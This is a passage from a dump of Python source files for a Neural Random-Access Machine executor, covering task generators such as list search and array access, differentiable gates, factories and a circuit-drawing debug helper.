P( x = 0 )) component from all registers.\n last_hidden_layer = np.array(registers[:, 0][None, ...], dtype=np.float32)\n\n # Propagate forward to hidden layers.\n idx = 0\n for i in range(self.context.num_hidden_layers):\n W, b, idx = take_params(self.context.network, idx)\n last_hidden_layer = relu(last_hidden_layer.dot(W) + b)\n\n controller_coefficients = []\n for i, gate in enumerate(self.context.gates):\n coeffs = []\n for j in range(gate.arity):\n W, b, idx = take_params(self.context.network, idx)\n coeff = softmax(last_hidden_layer.dot(W) + b)\n coeffs.append(coeff)\n controller_coefficients.append(coeffs)\n\n # Forward propagate to new register value coefficients.\n for i in range(self.context.num_regs):\n W, b, idx = take_params(self.context.network, idx)\n coeff = softmax(last_hidden_layer.dot(W) + b)\n controller_coefficients.append(coeff)\n\n # Forward propagate to generate willingness to complete.\n W, b, idx = take_params(self.context.network, idx)\n complete = sigmoid(last_hidden_layer.dot(W) + b)\n\n if debug is not None:\n debug.fi = np.around(complete.sum(), 3)\n\n return controller_coefficients, complete\n
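\n\n# Parameter layout (illustrative note, derived from __run_network above):\n# self.context.network is a flat list [W, b, W, b, ...] consumed in order by\n# take_params: first one (W, b) pair per hidden layer, then one per gate\n# argument, then one per register, and a final (W, b) for the willingness\n# to complete.\n"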
},
{
"alpha_fraction": 0.5731343030929565,
"alphanum_fraction": 0.5889126062393188,
"avg_line_length": 46.85714340209961,
"blob_id": "da0ab0474d60687a5bdaae29c18506d6441aa4d1",
"content_id": "cc0a56617ce8e8f6cecdd5dcdb33f5ea2f7b1632",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 49,
"path": "/tasks/TaskListSearch.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\nclass TaskListSearch(Task):\n \"\"\" [ListSearch]\n Given a pointer to the head of a linked list and a value `v` to find return a pointer\n to the first node on the list with the value `v`. The list is placed in memory in the same way\n as in the task ListK. We fill empty memory with “trash” values to prevent the network from\n “cheating” and just iterating over the whole memory.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n list_size = int((self.max_int - 2) / 2)\n list_elements = np.random.randint(0, self.max_int, size=(self.batch_size, list_size))\n lists_elements_permutations = np.stack([np.random.permutation(list_size) for _ in range(self.batch_size)], axis=0)\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n\n # Create for each example the list\n for example in range(self.batch_size):\n for j, permidx in enumerate(lists_elements_permutations[example]):\n next_element_pointer = np.where(lists_elements_permutations[example] == permidx + 1)[0]\n if permidx == 0: # If the node is the first than set the pointer in the first memory position\n init_mem[example, 0] = 2 + 2 * j\n\n init_mem[example, 2 + (2 * j)] = \\\n -1.0 if len(next_element_pointer) == 0 else 2 + (2 * next_element_pointer[0]) # Set the pointer to the next list node\n init_mem[example, 2 + (2 * j) + 1] = list_elements[example, j] # Set the value of the list node\n init_mem[:, 1] = list_elements[:, 0] # Set the elements to search in the list\n if self.max_int % 2 != 0:\n init_mem[:, -1] = -1\n\n out_mem = init_mem.copy()\n for example in range(self.batch_size):\n found = False\n pointer = out_mem[example, 0]\n while not found and pointer != -1:\n if out_mem[example, pointer + 1] == out_mem[example, 1]:\n out_mem[example, 0] = pointer\n found = True\n else:\n pointer = out_mem[example, pointer]\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 0] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.7163636088371277,
"alphanum_fraction": 0.7163636088371277,
"avg_line_length": 55.617645263671875,
"blob_id": "b7d9c0a36630fa5bd7f5800c691b7dd51e7d02b5",
"content_id": "4b2b797867c1796309d0b1a35bd4bbcc44b4370f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1925,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 34,
"path": "/factories/TaskFactory.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Project\nfrom Singleton import Singleton\nfrom tasks.Task import Task\nfrom tasks.TaskCopy import TaskCopy\nfrom tasks.TaskAccess import TaskAccess\nfrom tasks.TaskIncrement import TaskIncrement\nfrom tasks.TaskSwap import TaskSwap\nfrom tasks.TaskReverse import TaskReverse\nfrom tasks.TaskPermutation import TaskPermutation\nfrom tasks.TaskListK import TaskListK\nfrom tasks.TaskListSearch import TaskListSearch\nfrom tasks.TaskMerge import TaskMerge\nfrom tasks.TaskWalkBST import TaskWalkBST\nfrom tasks.TaskSum import TaskSum\nfrom tasks.TaskProduct import TaskProduct\n\nclass TaskFactory(metaclass=Singleton):\n\n @staticmethod\n def create(name: str, batch_size: int, max_int: int, num_regs: int, timestep: int, sequence_size: int) -> Task:\n return {\n \"task_copy\": TaskCopy(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_access\": TaskAccess(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_increment\": TaskIncrement(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_swap\": TaskSwap(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_reverse\": TaskReverse(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_permutation\": TaskPermutation(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_list_k\": TaskListK(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_list_search\": TaskListSearch(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_merge\": TaskMerge(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_walkbst\": TaskWalkBST(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_sum\": TaskSum(batch_size, max_int, num_regs, timestep, sequence_size),\n \"task_product\": TaskProduct(batch_size, max_int, num_regs, timestep, sequence_size),\n }[name]\n"
},
{
"alpha_fraction": 0.6507575511932373,
"alphanum_fraction": 0.6507575511932373,
"avg_line_length": 33.76315689086914,
"blob_id": "27d8c7a2de11dfbe8b036834e8c1ffd8251e8f2f",
"content_id": "75c1eac8a2d7d71bda69a2d5d10dc9c0b0b1ca0d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1320,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 38,
"path": "/factories/GateFactory.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Project\nfrom Singleton import Singleton\nfrom gates.Gate import GateArity\nfrom gates.Read import Read\nfrom gates.Zero import Zero\nfrom gates.One import One\nfrom gates.Two import Two\nfrom gates.Inc import Inc\nfrom gates.Add import Add\nfrom gates.Sub import Sub\nfrom gates.Dec import Dec\nfrom gates.LessThan import LessThan\nfrom gates.LessEqualThan import LessEqualThan\nfrom gates.EqualThan import EqualThan\nfrom gates.Min import Min\nfrom gates.Max import Max\nfrom gates.Write import Write\n\nclass GateFactory(metaclass=Singleton):\n\n @staticmethod\n def create(cls):\n return {\n \"read\": Read(GateArity.UNARY.value),\n \"zero\": Zero(GateArity.CONST.value),\n \"one\": One(GateArity.CONST.value),\n \"two\": Two(GateArity.CONST.value),\n \"inc\": Inc(GateArity.UNARY.value),\n \"add\": Add(GateArity.BINARY.value),\n \"sub\": Sub(GateArity.BINARY.value),\n \"dec\": Dec(GateArity.UNARY.value),\n \"lt\": LessThan(GateArity.BINARY.value),\n \"let\": LessEqualThan(GateArity.BINARY.value),\n \"eq\": EqualThan(GateArity.BINARY.value),\n \"min\": Min(GateArity.BINARY.value),\n \"max\": Max(GateArity.BINARY.value),\n \"write\": Write(GateArity.BINARY.value),\n }[cls]"
},
{
"alpha_fraction": 0.49694502353668213,
"alphanum_fraction": 0.5021639466285706,
"avg_line_length": 39.081634521484375,
"blob_id": "5d470094f16283a9d52bc8662705ffc61ae3cff9",
"content_id": "f117588313fcc1b19b7a06499551a3c9ca6bb930",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7864,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 196,
"path": "/DebugTimestep.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nfrom subprocess import Popen\n\n# Vendor\nimport numpy as np\nimport pygraphviz as pgv\n\n# Project\nfrom Node import Node\nfrom NRamContext import NRamContext\n\n\nclass DebugTimestep(object):\n def __init__(self, context: NRamContext, timestep: int, sample: int) -> None:\n self.context = context\n self.timestep = timestep\n self.sample = sample\n self.__gates = dict()\n self.__regs = dict()\n self.__regs_previous_mod = dict()\n self.__mem = np.array([], dtype=np.float32)\n self.__mem_previous_mod = np.array([], dtype=np.float32)\n self.__fi = 0\n\n @property\n def gates(self) -> dict():\n return self.__gates\n\n @gates.setter\n def gates(self, gates: dict) -> None:\n self.__gates = gates\n\n @property\n def regs(self) -> dict:\n return self.__regs\n\n @regs.setter\n def regs(self, regs: dict) -> None:\n self.__regs = regs\n\n @property\n def mem(self) -> np.ndarray:\n return self.__mem\n\n @mem.setter\n def mem(self, mem: dict) -> None:\n self.__mem = mem\n\n @property\n def mem_previous_mod(self) -> np.ndarray:\n return self.__mem_previous_mod\n\n @mem_previous_mod.setter\n def mem_previous_mod(self, mem: dict) -> None:\n self.__mem_previous_mod = mem\n\n @property\n def regs_previous_mod(self) -> dict:\n return self.__regs_previous_mod\n\n @regs_previous_mod.setter\n def regs_previous_mod(self, regs: dict) -> None:\n self.__regs_previous_mod = regs\n\n @property\n def fi(self) -> float:\n return self.__fi\n\n @fi.setter\n def fi(self, fi):\n self.__fi = fi\n\n def __retrieve_gates_or_register(self, idx: int) -> str:\n \"\"\"Retrieve the right name for a coefficient (i.e. if it is a Register or a Gate)\"\"\"\n if idx in range(self.context.num_regs):\n return \"R%s\" % idx\n else:\n return self.context.gates[idx - self.context.num_regs].__str__()\n\n def print_pruned_circuit(self, path: str) -> bool:\n \"\"\" Print the circuit for the samples \"\"\"\n\n context = self.context\n nodes = {}\n\n for r in range(context.num_regs):\n nodes[\"R%s\" % str(r)] = Node(Node.Register, \"R%s\" % str(r))\n\n for g in context.gates:\n nodes[g.__str__()] = Node(Node.Register, g.__str__(), g.arity)\n for a in range(g.arity):\n coeff = self.__retrieve_gates_or_register(self.gates[g.__str__()][str(a)][0])\n nodes[coeff].add_node(nodes[g.__str__()])\n\n for r in range(context.num_regs):\n node_name = \"R'%s\" % str(r)\n nodes[\"R'%s\" % str(r)] = Node(Node.Register, node_name)\n nodes[self.__retrieve_gates_or_register(self.regs[str(r)][0])].add_node(nodes[node_name])\n\n right_nodes = []\n for key, node in nodes.items():\n if node.check_validity() and key not in right_nodes:\n right_nodes.append(node.name)\n\n return self.print_circuit(path, right_nodes)\n\n def print_circuit(self, path: str, nodes_to_prune: list = list()) -> bool:\n context = self.context\n\n G = pgv.AGraph(directed=True, strict=False, name=\"%s - Timestep %s\" % (self.context.tasks[0].__str__(), self.timestep))\n G.graph_attr[\"rankdir\"] = \"LR\"\n for r in range(context.num_regs):\n node_name = \"R%s\" % str(r)\n if len(nodes_to_prune) == 0 or node_name in nodes_to_prune:\n G.add_node(node_name, shape=\"circle\")\n\n for g in context.gates:\n if len(nodes_to_prune) == 0 or g.__str__() in nodes_to_prune:\n G.add_node(g.__str__(), shape=\"rectangle\")\n G.get_node(g.__str__()).attr[\"style\"] = \"bold\"\n for a in range(g.arity):\n coeff = self.__retrieve_gates_or_register(self.gates[g.__str__()][str(a)][0])\n G.add_edge(coeff, g.__str__())\n if g.__str__() is \"Write\":\n G.get_edge(coeff, 
g.__str__()).attr[\"label\"] = \"ptr\" if a is 0 else \"val\"\n elif g.__str__() is \"Read\":\n G.get_edge(coeff, g.__str__()).attr[\"label\"] = \"ptr\"\n elif g.__str__() in [\"Add\", \"Sub\", \"LessThan\", \"LessEqualThan\", \"EqualThan\", \"Min\", \"Max\"]:\n G.get_edge(coeff, g.__str__()).attr[\"label\"] = \"x\" if a is 0 else \"y\"\n\n for r in range(context.num_regs):\n node_name = \"R'%s\" % str(r)\n if len(nodes_to_prune) == 0 or node_name in nodes_to_prune:\n G.add_node(\"R'%s\" % str(r))\n G.add_node(node_name, shape=\"circle\")\n G.add_edge(self.__retrieve_gates_or_register(self.regs[str(r)][0]), node_name)\n\n # Removes the unattached register not modified and gates not attached to other objects (gates/register)\n for node in G.nodes_iter():\n if len(list(G.neighbors(node))) == 0:\n G.remove_node(node.name)\n\n G.layout(prog=\"dot\")\n circuit_path = \"%s/circuit.%s\" % (path, self.timestep)\n G.draw(\"%s.png\" % circuit_path, format=\"png\")\n G.write(\"%s.dot\" % circuit_path)\n\n Popen(\"dot2tex -ftikz %s.dot > %s.tex\" % (circuit_path, circuit_path), shell=True).wait()\n\n return True\n\n def print_memory_to_file(self, path: str, max_timestep: int):\n t = self.timestep\n with open(\"%s/memories.txt\" % path, \"a+\") as f:\n timestep_regs = [reg[1] for idx, reg in self.regs.items()]\n timestep_regs_previous_mod = [reg[1] for idx, reg in self.regs_previous_mod.items()]\n if t + 1 < max_timestep:\n f.write(\"%d & %s & %s & p:%s & p:%s v:%s \\\\\\\\ \\n\"\n % (t + 1,\n \" & \".join([\"%d\" % v for v in self.mem_previous_mod]),\n \" & \".join([\"%d\" % r for r in timestep_regs]),\n self.gates[\"Read\"]['0'][1],\n self.gates[\"Write\"]['0'][1], self.gates[\"Write\"]['1'][1]))\n else:\n f.write(\"%d & %s & %s & p:%s & p:%s v:%s\\\\\\\\ \\hline \\n\"\n % ( t + 1,\n \" & \".join([\"%d\" % v for v in self.mem_previous_mod]),\n \" & \".join([\"%d\" % r for r in timestep_regs]),\n self.gates[\"Read\"]['0'][1],\n self.gates[\"Write\"]['0'][1], self.gates[\"Write\"]['1'][1]))\n f.write(\"\\\\rowcolor{Gray}Final & %s & %s & $\\\\times$ & $\\\\times$ \\\\\\\\\"\n % (\" & \".join([\"%d\" % v for v in self.mem]),\n \" & \".join([\"%d\" % r for r in timestep_regs])))\n\n def __str__(self) -> str:\n\n def register_or_gates(type: int, idx: int, value: int = -1) -> str:\n if idx in range(self.context.num_regs): # Is a register\n return \"R%d: %d\" % (idx, value) if type is 0 else \"R%d\" % (idx)\n else: # Otherwise is a gate\n return \"%s: %d\" % (self.context.gates[idx - self.context.num_regs].__str__(), value) if type is 0 \\\n else \"%s\" % (self.context.gates[idx - self.context.num_regs].__str__())\n\n output = \"Timestep %d\\n\" % (self.timestep)\n for g in self.context.gates:\n values = [self.gates[g.__str__()][str(a)] for a in range(g.arity)]\n output += \"\\t• %s(%s) => %d\\n\" \\\n % (\n g, \", \".join([register_or_gates(0, *value) for value in values]), self.gates[g.__str__()][\"res\"])\n\n for r in range(self.context.num_regs):\n output += \"\\t• R%d' (%s) => %d\\n\" % (r, register_or_gates(1, self.regs[str(r)][0]), self.regs[str(r)][1])\n\n output += \"\\t• Fi => %s\\n\" % self.fi\n output += \"\\t• Mem => %s\" % self.mem\n return output\n"
},
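The drawing in DebugTimestep.print_circuit above boils down to a small pygraphviz pattern; a self-contained sketch of the same add_node/add_edge/layout/draw sequence (node names and output paths are illustrative, and Graphviz must be installed for the dot layout):

    import pygraphviz as pgv

    G = pgv.AGraph(directed=True, strict=False, name="Timestep 0")
    G.graph_attr["rankdir"] = "LR"
    G.add_node("R0", shape="circle")       # a register
    G.add_node("Inc", shape="rectangle")   # a gate
    G.add_edge("R0", "Inc")                # R0 feeds the Inc gate
    G.add_node("R'0", shape="circle")      # the updated register
    G.add_edge("Inc", "R'0")
    G.layout(prog="dot")
    G.draw("circuit.png", format="png")
    G.write("circuit.dot")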
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5512572526931763,
"avg_line_length": 18.148147583007812,
"blob_id": "239a94df9745750d6052b539f46708e5596cc70a",
"content_id": "f168779ea7b40054029e99e53eaddd79d14cefa5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 517,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 27,
"path": "/gates/Gate.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nfrom enum import Enum\n\n# Vendor\nimport numpy as np\n\n\nclass GateArity(Enum):\n\n # Gate arity\n CONST = 0\n UNARY = 1\n BINARY = 2\n\nclass Gate(object):\n \"\"\" Base class for Gate \"\"\"\n\n def __init__(self, arity) -> None:\n super(Gate, self).__init__()\n \n self.arity = arity\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n raise NotImplementedError()\n\n def __str__(self):\n return self.__class__.__name__\n"
},
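Subclassing the base class above only requires implementing __call__ with the (memory, A, B) -> (memory, result) contract; a hypothetical identity gate, not part of this repo:

    import numpy as np

    from gates.Gate import Gate, GateArity


    class Identity(Gate):
        """Hypothetical unary gate: leaves memory untouched and returns A unchanged."""

        def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):
            return M, A

    gate = Identity(GateArity.UNARY.value)  # arity 1, mirroring how GateFactory builds gates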
{
"alpha_fraction": 0.5554496049880981,
"alphanum_fraction": 0.5624403953552246,
"avg_line_length": 37.85185241699219,
"blob_id": "8907db20d91907aff94673c8061e4ef195b444e6",
"content_id": "fe66413be0186d0fde186d4b5ca761b45a4db952",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3147,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 81,
"path": "/NRamContext.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom factories.TaskFactory import TaskFactory\n\n\nclass NRamContext(object):\n def __init__(self,\n batch_size: int,\n l_max_int: list,\n l_sequence_size: list,\n l_timesteps: list,\n task_type: str,\n gates: list,\n network: list,\n print_circuits: str,\n print_memories: bool,\n path_config_file: str,\n info_is_active: bool,\n process_pool: int,\n stop_at_the_will: bool) -> None:\n self.gates = gates\n self.num_regs = len(network[0][0])\n self.num_hidden_layers = len(network[0:len(network) - 1])\n self.network = self.mlp_params(network, self.gates)\n\n self.batch_size = batch_size\n self.l_max_int = l_max_int\n self.l_sequence_size = l_sequence_size\n self.l_timesteps = l_timesteps\n self.tasks = list()\n for max_int, sequence_size, timesteps in zip(self.l_max_int, self.l_sequence_size, self.l_timesteps):\n self.tasks.append(\n TaskFactory.create(task_type, self.batch_size, max_int, self.num_regs, timesteps, sequence_size))\n\n # Every entry of the debug list is associated to a sample\n self.info_is_active = info_is_active\n\n # If None then the circuits will be not draw\n self.print_circuits = print_circuits\n\n self.print_memories = print_memories\n\n self.path_config_file = path_config_file\n\n self.process_pool = process_pool\n\n self.stop_at_the_will = stop_at_the_will\n\n def mlp_params(self, network: list, gates_list: list) -> list:\n # Hidden layers (Not output)\n layers = []\n for idx, l in enumerate(network[:-1]):\n layers.append(np.array(l[0], dtype=np.float32)) # Weights\n layers.append(np.array(l[1], dtype=np.float32)) # Bias\n\n # Output layers (for every gate coefficient)\n ptr = 0\n output_layer = network[-1]\n output_layer_weights = np.array(output_layer[0], dtype=np.float32)\n output_layer_bias = np.array(output_layer[1], dtype=np.float32)\n num_registers = self.num_regs\n for idx, g in enumerate(gates_list):\n for _ in range(g.arity):\n layers.append(output_layer_weights[:, ptr:ptr + num_registers]) # Weights\n layers.append(output_layer_bias[:, ptr:ptr + num_registers]) # Bias\n ptr += num_registers\n num_registers += 1\n\n # Output layers (for every register coefficient)\n for r in range(self.num_regs):\n layers.append(output_layer_weights[:, ptr:ptr + num_registers]) # Weights\n layers.append(output_layer_bias[:, ptr:ptr + num_registers]) # Bias\n ptr += num_registers\n\n # Output layer for the willingness of finish f_t\n layers.append(output_layer_weights[:, ptr:ptr + 1])\n layers.append(output_layer_bias[:, ptr:ptr + 1])\n\n return layers\n"
},
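The column slicing in mlp_params above follows the NRAM coefficient layout: one softmax block per gate argument (whose width grows by one for each earlier gate, since every gate's output becomes selectable), then one block per updated register, then a single column for the willingness-to-finish f_t. A sketch of the implied output-layer width, with hypothetical sizes:

    # Hypothetical configuration, used only to illustrate the slicing arithmetic.
    num_regs = 2
    gate_arities = [1, 1, 2]              # e.g. Read, Inc, Add

    width = 0
    selectable = num_regs                 # registers are selectable from the start
    for arity in gate_arities:
        width += arity * selectable       # one block per gate argument
        selectable += 1                   # the gate's output becomes selectable too
    width += num_regs * selectable        # one block per updated register
    width += 1                            # willingness-to-finish f_t
    print(width)                          # -> 24 output-layer columns expected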
{
"alpha_fraction": 0.6035714149475098,
"alphanum_fraction": 0.625,
"avg_line_length": 36.33333206176758,
"blob_id": "9b76060a2954e01e181efb2fe286a589ecbd4ad1",
"content_id": "0992bcd097a75dea9074536e208eb44b794ad836",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 15,
"path": "/gates/Write.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import tensordot, transpose, zeros_like, ones_like\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass Write(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n erase = tensordot(transpose(ones_like(A) - A, axes=[1, 0]), ones_like(A), axes=1)\n contrib = tensordot(transpose(A, axes=[1, 0]), B, axes=1)\n new_mem = (erase * M) + contrib\n return new_mem, np.array([[1 if idx == 0 else 0 for idx in np.arange(A.shape[1])]], dtype=np.float64)\n"
},
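The two tensordots in Write above implement the fuzzy update M'_i = (1 - a_i) * M_i + a_i * B for every row i, so a one-hot pointer replaces exactly one memory row. A quick check with illustrative values:

    import numpy as np

    from gates.Gate import GateArity
    from gates.Write import Write

    M = np.eye(4, dtype=np.float32)           # toy memory: 4 cells over 4 values
    A = np.array([[0., 0., 1., 0.]])          # pointer distribution: cell 2
    B = np.array([[0., 1., 0., 0.]])          # value distribution: value 1
    new_mem, _ = Write(GateArity.BINARY.value)(M, A, B)
    assert np.allclose(new_mem[2], B[0])      # row 2 now holds B
    assert np.allclose(new_mem[0], M[0])      # other rows are untouched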
{
"alpha_fraction": 0.8450704216957092,
"alphanum_fraction": 0.8450704216957092,
"avg_line_length": 35,
"blob_id": "7f9f10276f4feebf460dde953c2fd0e657092656",
"content_id": "02c1f5da2c74c8fb2305649938769720930924a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 2,
"path": "/__init__.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "from util import to_one_hot, encode\nfrom NRamContext import NRamContext"
},
{
"alpha_fraction": 0.5723404288291931,
"alphanum_fraction": 0.5914893746376038,
"avg_line_length": 30.33333396911621,
"blob_id": "6ac11928258e60c715ccc543d29359db72be27ce",
"content_id": "dcc4053ed1e7cf7977dfa0d87dee5359a6ced6f0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 15,
"path": "/gates/Add.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import tensordot, roll, transpose, stack\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass Add(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n rows = [roll(B[:, ::-1], shift=shift + 1, axis=1)\n for shift in range(M.shape[1])]\n B_prime = transpose(stack(rows, axis=1), axes=[0, 2, 1])\n return M, tensordot(A, B_prime, axes=2)[None, ...]\n"
},
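The roll/stack construction in Add above realises addition modulo max_int as a circular correlation of the two value distributions: for one-hot inputs the result is one-hot at (a + b) mod max_int. A quick check with illustrative values:

    import numpy as np

    from gates.Add import Add
    from gates.Gate import GateArity

    def one_hot(v, n):
        x = np.zeros((1, n), dtype=np.float32)
        x[0, v] = 1.0
        return x

    max_int = 5
    M = np.zeros((max_int, max_int), dtype=np.float32)  # memory is not used by Add
    _, Z = Add(GateArity.BINARY.value)(M, one_hot(3, max_int), one_hot(4, max_int))
    assert np.argmax(Z) == (3 + 4) % max_int            # -> 2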
{
"alpha_fraction": 0.5910418629646301,
"alphanum_fraction": 0.6085686683654785,
"avg_line_length": 35.67856979370117,
"blob_id": "5e3c1eae697b2a6e65bcf1487215ba0737f8bc2e",
"content_id": "45ec15ca35ba78217f48de73af0a55fcfd1221fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1027,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 28,
"path": "/tasks/TaskAccess.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskAccess(Task):\n \"\"\" [Access]\n Given a value k and an array A, return A[k]. Input is given as k, A[0], .., A[n - 1], NULL\n and the network should replace the first memory cell with A[k].\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n if self.sequence_size + 2 != self.max_int:\n raise Exception(\"Incompatible size of Max Int and input sequence.\")\n init_mem = np.random.randint(0, self.max_int, size=(self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 0] = np.random.randint(1, self.max_int - 1, size=(self.batch_size), dtype=np.int32)\n init_mem[:, self.max_int - 1] = 0\n\n out_mem = init_mem.copy()\n for sample, idx in enumerate(init_mem[:, 0]):\n out_mem[sample, 0] = init_mem[sample, idx]\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, 0] = 1\n\n return init_mem, out_mem, error_mask\n"
},
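A concrete instance of the memory layout built by TaskAccess.create above, for max_int = 6 (values are illustrative): cell 0 holds the index k, the last cell holds the NULL terminator, and only cell 0 is scored by the error mask.

    import numpy as np

    init_mem = np.array([2, 5, 1, 4, 3, 0])  # k = 2, then the array, then NULL
    out_mem = init_mem.copy()
    out_mem[0] = init_mem[init_mem[0]]       # the cell k points at: init_mem[2] = 1
    print(out_mem)                           # [1 5 1 4 3 0]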
{
"alpha_fraction": 0.600375235080719,
"alphanum_fraction": 0.6172608137130737,
"avg_line_length": 37.07143020629883,
"blob_id": "9ef065fe934dc629a9564ce5c3bca73578bae6ca",
"content_id": "662fe2b7b47b131a1fe510647e3d0fe4fb632b4c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1070,
"license_type": "permissive",
"max_line_length": 153,
"num_lines": 28,
"path": "/tasks/TaskIncrement.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskIncrement(Task):\n \"\"\" [Increment]\n Given an array A, increment all its elements by 1. Input is given as\n A[0], ..., A[n − 1], NULL and the expected output is A[0] + 1, ..., A[n − 1] + 1.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n \"\"\"Task 5: Increment\"\"\"\n input_sequence_size = min(self.sequence_size, self.max_int - 1)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, :input_sequence_size] = \\\n np.random.randint(1, self.max_int, size=(self.batch_size, input_sequence_size), dtype=np.int32)\n\n out_mem = init_mem.copy()\n out_mem[:, :min(self.timesteps, input_sequence_size)] = np.mod(np.add(init_mem[:, :min(self.timesteps, input_sequence_size)], [1]), self.max_int)\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, 0:min(self.timesteps, input_sequence_size)] = 1\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.5478261113166809,
"alphanum_fraction": 0.5710144639015198,
"avg_line_length": 22.066667556762695,
"blob_id": "614cf6ea4e2cbb3fa10eacb65bb9d40533b8bfd6",
"content_id": "7415ae17100f98772d4594d4eca0eb0bc2bde332",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 15,
"path": "/gates/EqualThan.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import zeros_like\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass EqualThan(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n Z = zeros_like(A)\n Z[0, 1] = np.tensordot(A, B, axes=2)\n Z[0, 0] = (1 - Z[0, 1])\n return M, Z"
},
{
"alpha_fraction": 0.5949417948722839,
"alphanum_fraction": 0.6105981469154358,
"avg_line_length": 48.81999969482422,
"blob_id": "0a6d4a1ddd617913fc857e7f92499b200faabe80",
"content_id": "fd5209a9021536348781ed1e60024125e6a61e4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2491,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 50,
"path": "/tasks/TaskListK.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
